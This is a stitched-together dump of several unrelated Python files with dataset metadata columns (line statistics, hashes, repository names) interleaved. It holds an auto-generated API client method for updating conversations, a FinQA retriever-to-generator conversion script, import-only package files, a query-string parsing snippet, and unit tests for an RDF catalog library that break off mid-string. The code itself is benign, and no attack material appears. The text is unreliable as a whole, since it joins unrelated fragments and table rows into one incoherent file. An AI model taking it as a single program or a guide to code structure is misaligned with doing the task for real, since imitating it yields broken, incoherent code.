    # The plain variant returns only the deserialized body, not the
    # (data, status, headers) tuple.
    kwargs = dict(kwargs, _return_http_data_only=True)
    return self.update_conversation_with_http_info(app_id, conversation_id, conversation_update_body, **kwargs)  # noqa: E501
def update_conversation_with_http_info(self, app_id, conversation_id, conversation_update_body, **kwargs):  # noqa: E501
    """Update Conversation  # noqa: E501

    Updates a conversation record (PATCH /v2/apps/{appId}/conversations/{conversationId}).  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_conversation_with_http_info(app_id, conversation_id, conversation_update_body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str app_id: Identifies the app. (required)
    :param str conversation_id: Identifies the conversation. (required)
    :param ConversationUpdateBody conversation_update_body: (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(ConversationResponse, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    :raises ApiTypeError: if an unexpected keyword argument is supplied.
    :raises ApiValueError: if a required parameter is missing (only when
                           client_side_validation is enabled).
    """
    # Snapshot the named arguments (and the kwargs dict) so every
    # parameter can be handled uniformly by name below.
    local_var_params = locals()

    all_params = [
        'app_id',
        'conversation_id',
        'conversation_update_body'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )

    # Reject unknown keyword arguments, then fold the accepted ones into
    # the flat parameter dict.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_conversation" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'app_id' is set
    if self.api_client.client_side_validation and ('app_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['app_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `app_id` when calling `update_conversation`")  # noqa: E501
    # verify the required parameter 'conversation_id' is set
    if self.api_client.client_side_validation and ('conversation_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['conversation_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `conversation_id` when calling `update_conversation`")  # noqa: E501
    # verify the required parameter 'conversation_update_body' is set
    if self.api_client.client_side_validation and ('conversation_update_body' not in local_var_params or  # noqa: E501
                                                   local_var_params['conversation_update_body'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `conversation_update_body` when calling `update_conversation`")  # noqa: E501

    collection_formats = {}

    # Substitute the URL template placeholders {appId}/{conversationId}.
    path_params = {}
    if 'app_id' in local_var_params:
        path_params['appId'] = local_var_params['app_id']  # noqa: E501
    if 'conversation_id' in local_var_params:
        path_params['conversationId'] = local_var_params['conversation_id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # The update payload is sent as the JSON request body.
    body_params = None
    if 'conversation_update_body' in local_var_params:
        body_params = local_var_params['conversation_update_body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['basicAuth', 'bearerAuth']  # noqa: E501

    return self.api_client.call_api(
        '/v2/apps/{appId}/conversations/{conversationId}', 'PATCH',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ConversationResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
| 48.655275
| 261
| 0.611299
| 3,587
| 32,745
| 5.327014
| 0.062448
| 0.043542
| 0.064476
| 0.02355
| 0.955097
| 0.951225
| 0.940077
| 0.938193
| 0.923435
| 0.920452
| 0
| 0.01655
| 0.315407
| 32,745
| 672
| 262
| 48.727679
| 0.835839
| 0.442938
| 0
| 0.708589
| 1
| 0
| 0.202853
| 0.060606
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033742
| false
| 0
| 0.015337
| 0
| 0.082822
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b2dbb40059f787d12da45bfd9ae2a50f20793b6b
| 10,000
|
py
|
Python
|
code/generator/Convert.py
|
humblef00ls/FinQA-new
|
ddef84d4dc397f5e14cb1623bc86dac133a8821c
|
[
"MIT"
] | null | null | null |
code/generator/Convert.py
|
humblef00ls/FinQA-new
|
ddef84d4dc397f5e14cb1623bc86dac133a8821c
|
[
"MIT"
] | null | null | null |
code/generator/Convert.py
|
humblef00ls/FinQA-new
|
ddef84d4dc397f5e14cb1623bc86dac133a8821c
|
[
"MIT"
] | null | null | null |
import argparse
import collections
import json
import os
import sys
import random
'''
convert retriever results to generator test input
'''
def remove_space(text_in):
    """Collapse runs of spaces in *text_in* into single spaces."""
    # Splitting on " " yields empty strings for consecutive (or leading/
    # trailing) spaces; drop those before re-joining with single spaces.
    return " ".join(token for token in text_in.split(" ") if token)
def table_row_to_text(header, row):
    """Render one table row as templated text.

    Emits "The <row name> of <column> is <cell> ;" for every non-first
    column, optionally prefixed by the first header cell when non-empty.
    """
    parts = []
    if header[0]:
        parts.append(header[0])
    for column_name, cell_value in zip(header[1:], row[1:]):
        parts.append(
            "The " + row[0] + " of " + column_name + " is " + cell_value + " ;")
    sentence = " ".join(parts)
    # Normalize any duplicate spaces contributed by the cell values
    # themselves (equivalent to the module's remove_space helper).
    sentence = " ".join(tok for tok in sentence.split(" ") if tok)
    return sentence.strip()
# for single sent retrieve
def convert_test(json_in, json_out, topn, max_len):
    """Convert retriever predictions into generator *test* input.

    For each example, keep at most `topn` retrieved units (table rows and
    text sentences), chosen greedily by retriever score while the running
    whitespace-token count stays under `max_len`, then store them in
    document order under each_data["qa"]["model_input"] and write the
    result to `json_out`.

    :param json_in: path to the retriever's predictions JSON (list of examples).
    :param json_out: destination JSON path.
    :param topn: maximum number of retrieved units to keep per example.
    :param max_len: token budget (whitespace tokens) for the kept units.
    """
    with open(json_in) as f_in:
        data = json.load(f_in)

    for each_data in data:
        table_retrieved = each_data["table_retrieved"]
        text_retrieved = each_data["text_retrieved"]
        pre_text = each_data["pre_text"]
        post_text = each_data["post_text"]
        all_text = pre_text + post_text
        table = each_data["table"]

        # Rank table rows and sentences together, best score first.
        all_retrieved = each_data["table_retrieved"] + \
            each_data["text_retrieved"]
        sorted_dict = sorted(
            all_retrieved, key=lambda kv: kv["score"], reverse=True)

        acc_len = 0
        all_text_in = {}
        all_table_in = {}

        for tmp in sorted_dict:
            if len(all_table_in) + len(all_text_in) >= topn:
                break
            # "ind" looks like "table_3" or "text_7"; the numeric suffix
            # indexes the table rows or the concatenated pre/post text.
            this_sent_ind = int(tmp["ind"].split("_")[1])
            if "table" in tmp["ind"]:
                this_sent = table_row_to_text(table[0], table[this_sent_ind])
            else:
                this_sent = all_text[this_sent_ind]
            if acc_len + len(this_sent.split(" ")) < max_len:
                if "table" in tmp["ind"]:
                    all_table_in[tmp["ind"]] = this_sent
                else:
                    all_text_in[tmp["ind"]] = this_sent
                acc_len += len(this_sent.split(" "))
            else:
                # Token budget exhausted: stop even if fewer than topn kept.
                break

        this_model_input = []

        # sorted_dict = sorted(all_table_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
        # this_model_input.extend(sorted_dict)
        # sorted_dict = sorted(all_text_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
        # this_model_input.extend(sorted_dict)

        # original_order
        # Re-emit kept units in document order: pre-text sentences first,
        # then table rows, then post-text sentences.
        sorted_dict_table = sorted(
            all_table_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
        sorted_dict_text = sorted(
            all_text_in.items(), key=lambda kv: int(kv[0].split("_")[1]))

        for tmp in sorted_dict_text:
            # Indices below len(pre_text) belong to the pre-table text.
            if int(tmp[0].split("_")[1]) < len(pre_text):
                this_model_input.append(tmp)

        for tmp in sorted_dict_table:
            this_model_input.append(tmp)

        for tmp in sorted_dict_text:
            if int(tmp[0].split("_")[1]) >= len(pre_text):
                this_model_input.append(tmp)

        each_data["qa"]["model_input"] = this_model_input

    with open(json_out, "w") as f:
        json.dump(data, f, indent=4)

    print(len(data))
def convert_train(json_in, json_out, topn, max_len):
    """Convert retriever predictions into generator *training* input.

    Unlike convert_test, the annotated gold supporting facts
    (qa["gold_inds"]) are always kept; the remaining slots (up to `topn`
    units and `max_len` whitespace tokens overall) are filled with the
    highest-scoring non-gold retrievals. The kept units are stored in
    document order under each_data["qa"]["model_input"].

    :param json_in: path to the retriever's predictions JSON (list of examples).
    :param json_out: destination JSON path.
    :param topn: maximum number of units (gold + retrieved) to keep.
    :param max_len: token budget (whitespace tokens) for the kept units.
    """
    with open(json_in) as f_in:
        data = json.load(f_in)

    for each_data in data:
        table_retrieved = each_data["table_retrieved"]
        text_retrieved = each_data["text_retrieved"]
        pre_text = each_data["pre_text"]
        post_text = each_data["post_text"]
        all_text = pre_text + post_text
        gold_inds = each_data["qa"]["gold_inds"]
        table = each_data["table"]

        all_retrieved = each_data["table_retrieved"] + \
            each_data["text_retrieved"]

        # Negatives: retrieved units that are not gold supporting facts.
        false_retrieved = []
        for tmp in all_retrieved:
            if tmp["ind"] not in gold_inds:
                false_retrieved.append(tmp)

        sorted_dict = sorted(
            false_retrieved, key=lambda kv: kv["score"], reverse=True)

        acc_len = 0
        all_text_in = {}
        all_table_in = {}

        # Gold facts are always included, bucketed by source kind.
        for tmp in gold_inds:
            if "table" in tmp:
                all_table_in[tmp] = gold_inds[tmp]
            else:
                all_text_in[tmp] = gold_inds[tmp]

        # Charge the gold facts against the token budget up front.
        context = ""
        for tmp in gold_inds:
            context += gold_inds[tmp]
        acc_len = len(context.split(" "))

        for tmp in sorted_dict:
            if len(all_table_in) + len(all_text_in) >= topn:
                break
            # "ind" looks like "table_3" or "text_7"; the numeric suffix
            # indexes the table rows or the concatenated pre/post text.
            this_sent_ind = int(tmp["ind"].split("_")[1])
            if "table" in tmp["ind"]:
                this_sent = table_row_to_text(table[0], table[this_sent_ind])
            else:
                this_sent = all_text[this_sent_ind]
            if acc_len + len(this_sent.split(" ")) < max_len:
                if "table" in tmp["ind"]:
                    all_table_in[tmp["ind"]] = this_sent
                else:
                    all_text_in[tmp["ind"]] = this_sent
                acc_len += len(this_sent.split(" "))
            else:
                # Token budget exhausted: stop adding negatives.
                break

        this_model_input = []

        # sorted_dict = sorted(all_table_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
        # this_model_input.extend(sorted_dict)
        # sorted_dict = sorted(all_text_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
        # this_model_input.extend(sorted_dict)

        # original_order
        # Re-emit kept units in document order: pre-text sentences first,
        # then table rows, then post-text sentences.
        sorted_dict_table = sorted(
            all_table_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
        sorted_dict_text = sorted(
            all_text_in.items(), key=lambda kv: int(kv[0].split("_")[1]))

        for tmp in sorted_dict_text:
            if int(tmp[0].split("_")[1]) < len(pre_text):
                this_model_input.append(tmp)

        for tmp in sorted_dict_table:
            this_model_input.append(tmp)

        for tmp in sorted_dict_text:
            if int(tmp[0].split("_")[1]) >= len(pre_text):
                this_model_input.append(tmp)

        each_data["qa"]["model_input"] = this_model_input

    with open(json_out, "w") as f:
        json.dump(data, f, indent=4)
def convert_test_infer(json_in, json_out, topn, mode):
    """Convert retriever *all-candidate* scores into single-modality input.

    Reads "table_retrieved_all"/"text_retrieved_all", keeps the `topn`
    highest-scoring table rows AND the `topn` highest-scoring sentences,
    but emits only one modality — table rows when mode == "table",
    sentences otherwise — in document order under
    each_data["qa"]["model_input"].

    :param json_in: path to the retriever's predictions JSON (list of examples).
    :param json_out: destination JSON path.
    :param topn: number of top-scored units to keep per modality.
    :param mode: "table" to emit table rows; any other value emits text.
    """
    with open(json_in) as f_in:
        data = json.load(f_in)

    for each_data in data:
        table_retrieved = each_data["table_retrieved_all"]
        text_retrieved = each_data["text_retrieved_all"]
        pre_text = each_data["pre_text"]
        post_text = each_data["post_text"]
        all_text = pre_text + post_text
        table = each_data["table"]

        # all_retrieved = each_data["table_retrieved"] + each_data["text_retrieved"]
        # sorted_dict = sorted(all_retrieved, key=lambda kv: kv["score"], reverse=True)

        # Rank each modality separately, best score first.
        sorted_dict_text = sorted(
            text_retrieved, key=lambda kv: kv["score"], reverse=True)
        sorted_dict_table = sorted(
            table_retrieved, key=lambda kv: kv["score"], reverse=True)
        # print(sorted_dict_table)

        acc_len = 0
        all_text_in = {}
        all_table_in = {}

        # if mode == "table":
        # Keep the topn best table rows, rendered as templated text.
        for tmp in sorted_dict_table[:topn]:
            this_sent_ind = int(tmp["ind"].split("_")[1])
            this_sent = table_row_to_text(table[0], table[this_sent_ind])
            all_table_in[tmp["ind"]] = this_sent

        # Keep the topn best sentences from the concatenated pre/post text.
        for tmp in sorted_dict_text[:topn]:
            this_sent_ind = int(tmp["ind"].split("_")[1])
            all_text_in[tmp["ind"]] = all_text[this_sent_ind]

        this_model_input = []

        # sorted_dict = sorted(all_table_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
        # this_model_input.extend(sorted_dict)
        # sorted_dict = sorted(all_text_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
        # this_model_input.extend(sorted_dict)

        # original_order
        # Restore document order within each modality.
        sorted_dict_table = sorted(
            all_table_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
        sorted_dict_text = sorted(
            all_text_in.items(), key=lambda kv: int(kv[0].split("_")[1]))

        # for tmp in sorted_dict_text:
        #     if int(tmp[0].split("_")[1]) < len(pre_text):
        #         this_model_input.append(tmp)
        # for tmp in sorted_dict_table:
        #     this_model_input.append(tmp)
        # for tmp in sorted_dict_text:
        #     if int(tmp[0].split("_")[1]) >= len(pre_text):
        #         this_model_input.append(tmp)

        # Only the requested modality reaches the model input.
        if mode == "table":
            for tmp in sorted_dict_table:
                this_model_input.append(tmp)
        else:
            for tmp in sorted_dict_text:
                this_model_input.append(tmp)

        each_data["qa"]["model_input"] = this_model_input

    with open(json_out, "w") as f:
        json.dump(data, f, indent=4)

    print(len(data))
if __name__ == '__main__':
    # NOTE(review): hard-coded to one user's Colab home — adjust `root`
    # (and the timestamped retriever run directories below) for your setup.
    root = "/home/leo_lin_colab/FinQA-main/"

    ### convert the results from the retriever.
    ### json_in is the inference result file generated from the retriever. Edit the paths here.
    # Training split: gold facts are kept, padded with top negatives.
    json_in = root + "code/retriever/path_to_store_outputs/inference_only_20211205213023_retriever-bert-base-train_toy/results/test/predictions.json"
    json_out = root + "dataset/train_toy_retrieve.json"
    convert_train(json_in, json_out, topn=3, max_len=290)

    # Dev split is converted with the training recipe as well (gold kept).
    json_in = root + "code/retriever/path_to_store_outputs/inference_only_20211205212940_retriever-bert-base-dev_toy/results/test/predictions.json"
    json_out = root + "dataset/dev_toy_retrieve.json"
    convert_train(json_in, json_out, topn=3, max_len=290)

    # Test split: purely retrieval-ranked, no gold facts available.
    json_in = root + "code/retriever/path_to_store_outputs/inference_only_20211205212832_retriever-bert-base-test_toy/results/test/predictions.json"
    json_out = root + "dataset/test_toy_retrieve.json"
    convert_test(json_in, json_out, topn=3, max_len=290)

    # json_in = root + "outputs/inference_only_20210505220955_retriever-bert-base-7k-test-new/results/test/predictions.json"
    # json_out = root + "FinQA/dataset/test_retrieve_7k_text_only.json"
    # convert_test_infer(json_in, json_out, topn=3, mode="text")
| 31.64557
| 149
| 0.5919
| 1,370
| 10,000
| 3.99562
| 0.092701
| 0.071246
| 0.058824
| 0.038363
| 0.814943
| 0.796675
| 0.782974
| 0.770004
| 0.74662
| 0.696931
| 0
| 0.017407
| 0.2819
| 10,000
| 315
| 150
| 31.746032
| 0.744882
| 0.1704
| 0
| 0.710383
| 0
| 0.016393
| 0.110908
| 0.060584
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027322
| false
| 0
| 0.032787
| 0
| 0.071038
| 0.010929
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b2e9d2dcb3a0622d6b62b0ea852e72d24d8f5d2a
| 108
|
py
|
Python
|
source/utils/__init__.py
|
EmilePapillon/Udacity-MLND-Capstone
|
e5b5112c0a8c24fca32dc60953b93c5e4772b5cb
|
[
"MIT"
] | 19
|
2022-01-19T08:26:26.000Z
|
2022-03-25T18:17:57.000Z
|
source/utils/__init__.py
|
EmilePapillon/Udacity-MLND-Capstone
|
e5b5112c0a8c24fca32dc60953b93c5e4772b5cb
|
[
"MIT"
] | null | null | null |
source/utils/__init__.py
|
EmilePapillon/Udacity-MLND-Capstone
|
e5b5112c0a8c24fca32dc60953b93c5e4772b5cb
|
[
"MIT"
] | 5
|
2022-01-20T07:03:06.000Z
|
2022-03-06T01:48:14.000Z
|
from .dir_utils import *
from .image_utils import *
from .model_utils import *
from .dataset_utils import *
| 21.6
| 28
| 0.777778
| 16
| 108
| 5
| 0.4375
| 0.55
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 108
| 4
| 29
| 27
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b2eec956624d63cc34822c5d8782052aa71d91ae
| 2,947
|
py
|
Python
|
venv/Lib/site-packages/qcs_api_client/operations/sync_from_dict/__init__.py
|
Holly-Jiang/QCTSA
|
b90136b9df18fc21ae53b431f1e5e0c6ef786fae
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/qcs_api_client/operations/sync_from_dict/__init__.py
|
Holly-Jiang/QCTSA
|
b90136b9df18fc21ae53b431f1e5e0c6ef786fae
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/qcs_api_client/operations/sync_from_dict/__init__.py
|
Holly-Jiang/QCTSA
|
b90136b9df18fc21ae53b431f1e5e0c6ef786fae
|
[
"MIT"
] | null | null | null |
from qcs_api_client.api.account.add_group_user import sync_from_dict as add_group_user
from qcs_api_client.api.account.list_group_users import sync_from_dict as list_group_users
from qcs_api_client.api.account.list_user_groups import sync_from_dict as list_user_groups
from qcs_api_client.api.account.remove_group_user import sync_from_dict as remove_group_user
from qcs_api_client.api.authentication.auth_email_password_reset_token import (
sync_from_dict as auth_email_password_reset_token,
)
from qcs_api_client.api.authentication.auth_get_user import sync_from_dict as auth_get_user
from qcs_api_client.api.authentication.auth_reset_password import sync_from_dict as auth_reset_password
from qcs_api_client.api.authentication.auth_reset_password_with_token import (
sync_from_dict as auth_reset_password_with_token,
)
from qcs_api_client.api.client_applications.check_client_application import sync_from_dict as check_client_application
from qcs_api_client.api.client_applications.get_client_application import sync_from_dict as get_client_application
from qcs_api_client.api.client_applications.list_client_applications import sync_from_dict as list_client_applications
from qcs_api_client.api.default.get_health import sync_from_dict as get_health
from qcs_api_client.api.default.health_check import sync_from_dict as health_check
from qcs_api_client.api.endpoints.create_endpoint import sync_from_dict as create_endpoint
from qcs_api_client.api.endpoints.delete_endpoint import sync_from_dict as delete_endpoint
from qcs_api_client.api.endpoints.get_default_endpoint import sync_from_dict as get_default_endpoint
from qcs_api_client.api.endpoints.get_endpoint import sync_from_dict as get_endpoint
from qcs_api_client.api.endpoints.list_endpoints import sync_from_dict as list_endpoints
from qcs_api_client.api.engagements.create_engagement import sync_from_dict as create_engagement
from qcs_api_client.api.quantum_processors.get_instruction_set_architecture import (
sync_from_dict as get_instruction_set_architecture,
)
from qcs_api_client.api.quantum_processors.get_quantum_processor import sync_from_dict as get_quantum_processor
from qcs_api_client.api.quantum_processors.list_quantum_processors import sync_from_dict as list_quantum_processors
from qcs_api_client.api.reservations.create_reservation import sync_from_dict as create_reservation
from qcs_api_client.api.reservations.delete_reservation import sync_from_dict as delete_reservation
from qcs_api_client.api.reservations.find_available_reservations import sync_from_dict as find_available_reservations
from qcs_api_client.api.reservations.list_reservations import sync_from_dict as list_reservations
from qcs_api_client.api.translation.get_quilt_calibrations import sync_from_dict as get_quilt_calibrations
from qcs_api_client.api.translation.translate_native_quil_to_encrypted_binary import (
sync_from_dict as translate_native_quil_to_encrypted_binary,
)
| 79.648649
| 118
| 0.902273
| 478
| 2,947
| 5.089958
| 0.112971
| 0.114673
| 0.115084
| 0.184135
| 0.819153
| 0.776819
| 0.431977
| 0.19852
| 0.085491
| 0
| 0
| 0
| 0.065151
| 2,947
| 36
| 119
| 81.861111
| 0.883122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.138889
| 0.777778
| 0
| 0.777778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
653ef93c96f60e11c71ef79510d65ba389a993a5
| 2,151
|
py
|
Python
|
__scraping__/sharesansar.com - requests, JSON/main-parse-url.py
|
furas/python-code
|
223d8245c6a2a058031f302feaffd9a4f900110e
|
[
"MIT"
] | 2
|
2015-12-12T20:14:12.000Z
|
2016-08-13T00:42:10.000Z
|
__scraping__/sharesansar.com - requests, JSON/main-parse-url.py
|
furas/python-code
|
223d8245c6a2a058031f302feaffd9a4f900110e
|
[
"MIT"
] | null | null | null |
__scraping__/sharesansar.com - requests, JSON/main-parse-url.py
|
furas/python-code
|
223d8245c6a2a058031f302feaffd9a4f900110e
|
[
"MIT"
] | null | null | null |
"""Decode a DataTables-style AJAX query string into its parameter map."""
import urllib.parse
import pprint

# Raw query string captured from a sharesansar.com request; the column
# definitions are percent-encoded (%5B == '[' and %5D == ']').
query = 'draw=1&columns%5B0%5D%5Bdata%5D=DT_Row_Index&columns%5B0%5D%5Bname%5D=&columns%5B0%5D%5Bsearchable%5D=false&columns%5B0%5D%5Borderable%5D=false&columns%5B0%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B0%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B1%5D%5Bdata%5D=published_date&columns%5B1%5D%5Bname%5D=&columns%5B1%5D%5Bsearchable%5D=true&columns%5B1%5D%5Borderable%5D=false&columns%5B1%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B1%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B2%5D%5Bdata%5D=open&columns%5B2%5D%5Bname%5D=&columns%5B2%5D%5Bsearchable%5D=false&columns%5B2%5D%5Borderable%5D=false&columns%5B2%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B2%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B3%5D%5Bdata%5D=high&columns%5B3%5D%5Bname%5D=&columns%5B3%5D%5Bsearchable%5D=false&columns%5B3%5D%5Borderable%5D=false&columns%5B3%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B3%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B4%5D%5Bdata%5D=low&columns%5B4%5D%5Bname%5D=&columns%5B4%5D%5Bsearchable%5D=false&columns%5B4%5D%5Borderable%5D=false&columns%5B4%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B4%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B5%5D%5Bdata%5D=close&columns%5B5%5D%5Bname%5D=&columns%5B5%5D%5Bsearchable%5D=false&columns%5B5%5D%5Borderable%5D=false&columns%5B5%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B5%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B6%5D%5Bdata%5D=per_change&columns%5B6%5D%5Bname%5D=&columns%5B6%5D%5Bsearchable%5D=false&columns%5B6%5D%5Borderable%5D=false&columns%5B6%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B6%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B7%5D%5Bdata%5D=traded_quantity&columns%5B7%5D%5Bname%5D=&columns%5B7%5D%5Bsearchable%5D=false&columns%5B7%5D%5Borderable%5D=false&columns%5B7%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B7%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B8%5D%5Bdata%5D=traded_amount&columns%5B8%5D%5Bname%5D=&columns%5B8%5D%5Bsearchable%5D=false&columns%5B8%5D%5Borderable%5D=false&columns%5B8%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B8%5D%5Bsearch%5D%5Bregex%5D=false&start=0&length=20&search%5Bvalue%5D=&search%5Bregex%5D=false&company=95&_=1639245456705'

# parse_qs decodes percent-escapes and maps every key to a LIST of values;
# keys whose value is empty are dropped by default (keep_blank_values=False).
items = urllib.parse.parse_qs(query)

pprint.pprint(items)
| 239
| 2,055
| 0.812645
| 379
| 2,151
| 4.591029
| 0.134565
| 0.108621
| 0.201149
| 0.087931
| 0.647701
| 0.311494
| 0.151724
| 0
| 0
| 0
| 0
| 0.153954
| 0.006509
| 2,151
| 8
| 2,056
| 268.875
| 0.660271
| 0
| 0
| 0
| 0
| 0.2
| 0.951163
| 0.951163
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.4
| 0
| 0.4
| 0.4
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
e8ff1e08ecbbffb3168d7c779989697ef937dce2
| 10,251
|
py
|
Python
|
tests/test_catalogrecord.py
|
Informasjonsforvaltning/datacatalogtordf
|
7e21186e9bd03e434a0319b2f36aecf78d7c16ee
|
[
"Apache-2.0"
] | 2
|
2020-05-18T06:57:12.000Z
|
2020-06-25T12:46:42.000Z
|
tests/test_catalogrecord.py
|
Informasjonsforvaltning/datacatalogtordf
|
7e21186e9bd03e434a0319b2f36aecf78d7c16ee
|
[
"Apache-2.0"
] | 42
|
2020-03-17T16:09:56.000Z
|
2022-03-28T06:12:01.000Z
|
tests/test_catalogrecord.py
|
Informasjonsforvaltning/datacatalogtordf
|
7e21186e9bd03e434a0319b2f36aecf78d7c16ee
|
[
"Apache-2.0"
] | null | null | null |
"""Test cases for the dataset module."""
from pytest_mock import MockFixture
from rdflib import Graph
from rdflib.compare import graph_diff, isomorphic
from skolemizer.testutils import skolemization
from datacatalogtordf import CatalogRecord
from datacatalogtordf import Dataset
from tests.testutils import assert_isomorphic
def test_to_graph_should_return_identifier_set_at_constructor() -> None:
    """It returns an identifier graph isomorphic to spec."""
    # Identifier supplied directly to the constructor.
    catalogrecord = CatalogRecord("http://example.com/datasets/1")

    src = """
    @prefix dct: <http://purl.org/dc/terms/> .
    @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
    @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
    @prefix dcat: <http://www.w3.org/ns/dcat#> .

    <http://example.com/datasets/1> a dcat:CatalogRecord .
    """
    g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
    g2 = Graph().parse(data=src, format="turtle")

    _isomorphic = isomorphic(g1, g2)
    if not _isomorphic:
        # Dump the triple-level diff for debugging before failing.
        # (Removed a redundant trailing `pass` statement here.)
        _dump_diff(g1, g2)
    assert _isomorphic
def test_to_graph_should_return_identifier() -> None:
    """It returns an identifier graph isomorphic to spec."""
    # Identifier assigned via the attribute rather than the constructor.
    catalogrecord = CatalogRecord()
    catalogrecord.identifier = "http://example.com/datasets/1"

    src = """
    @prefix dct: <http://purl.org/dc/terms/> .
    @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
    @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
    @prefix dcat: <http://www.w3.org/ns/dcat#> .

    <http://example.com/datasets/1> a dcat:CatalogRecord .
    """
    g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
    g2 = Graph().parse(data=src, format="turtle")

    _isomorphic = isomorphic(g1, g2)
    if not _isomorphic:
        # Dump the triple-level diff for debugging before failing.
        # (Removed a redundant trailing `pass` statement here.)
        _dump_diff(g1, g2)
    assert _isomorphic
def test_to_graph_should_return_skolemization(mocker: MockFixture) -> None:
    """It returns a skolemized identifier graph isomorphic to spec."""
    record = CatalogRecord()

    expected = """
